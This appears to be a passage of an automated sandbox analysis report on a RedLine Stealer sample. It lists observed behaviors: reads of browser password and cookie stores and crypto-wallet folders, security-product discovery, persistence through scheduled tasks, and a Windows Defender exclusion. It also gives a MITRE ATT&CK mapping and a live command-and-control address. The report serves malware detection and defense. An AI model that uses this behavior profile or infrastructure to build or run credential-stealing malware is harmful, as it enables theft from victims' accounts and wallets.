                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Users\user\AppData\Roaming\VcihjWRO.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2344279205.0000000006192000.00000004.00000020.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2323363497.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2445364928.0000000006B49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7568, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7568, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VcihjWRO.exe PID: 7568, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory331
                    Security Software Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS241
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync113
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548177 Sample: I5pvP0CU6M.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 52 api.ip.sb 2->52 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 11 other signatures 2->62 8 I5pvP0CU6M.exe 7 2->8         started        12 VcihjWRO.exe 2->12         started        signatures3 process4 file5 44 C:\Users\user\AppData\Roaming\VcihjWRO.exe, PE32 8->44 dropped 46 C:\Users\...\VcihjWRO.exe:Zone.Identifier, ASCII 8->46 dropped 48 C:\Users\user\AppData\Local\...\tmp4733.tmp, XML 8->48 dropped 50 C:\Users\user\AppData\...\I5pvP0CU6M.exe.log, ASCII 8->50 dropped 64 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 68 Uses schtasks.exe or at.exe to add and modify task schedules 8->68 70 Adds a directory exclusion to Windows Defender 8->70 14 I5pvP0CU6M.exe 15 49 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 74 Injects a PE file into a foreign processes 12->74 24 VcihjWRO.exe 12->24         started        26 schtasks.exe 12->26         started        28 VcihjWRO.exe 12->28         started        signatures6 process7 dnsIp8 54 45.137.22.248, 49718, 49777, 49784 ROOTLAYERNETNL Netherlands 14->54 30 conhost.exe 14->30         started        76 Loading BitLocker PowerShell Module 18->76 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        78 Tries to harvest and steal browser information (history, passwords, etc) 24->78 80 Tries to steal Crypto Currency Wallets 24->80 40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    I5pvP0CU6M.exe68%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    I5pvP0CU6M.exe65%VirustotalBrowse
                    I5pvP0CU6M.exe100%AviraHEUR/AGEN.1357257
                    I5pvP0CU6M.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\VcihjWRO.exe68%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                    http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                    http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    45.137.22.248:55615true
                      		unknown
                      http://45.137.22.248:55615/true
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ipinfo.io/ip%appdata%I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://duckduckgo.com/chrome_newtabtmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://tempuri.org/Endpoint/CheckConnectResponseI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://schemas.datacontract.org/2004/07/I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://tempuri.org/Endpoint/EnvironmentSettingsI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://api.ip.sb/geoip%USERPEnvironmentROFILE%I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://schemas.xmlsoap.org/soap/envelope/VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://tempuri.org/Gamee.xsd7PoisonRoulette.GameResourceI5pvP0CU6M.exe, VcihjWRO.exe.0.drfalse
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/VcihjWRO.exe, 00000011.00000002.2427530855.0000000003350000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://tempuri.org/Endpoint/CheckConnectI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                    • URL Reputation: safe
                                    		unknown
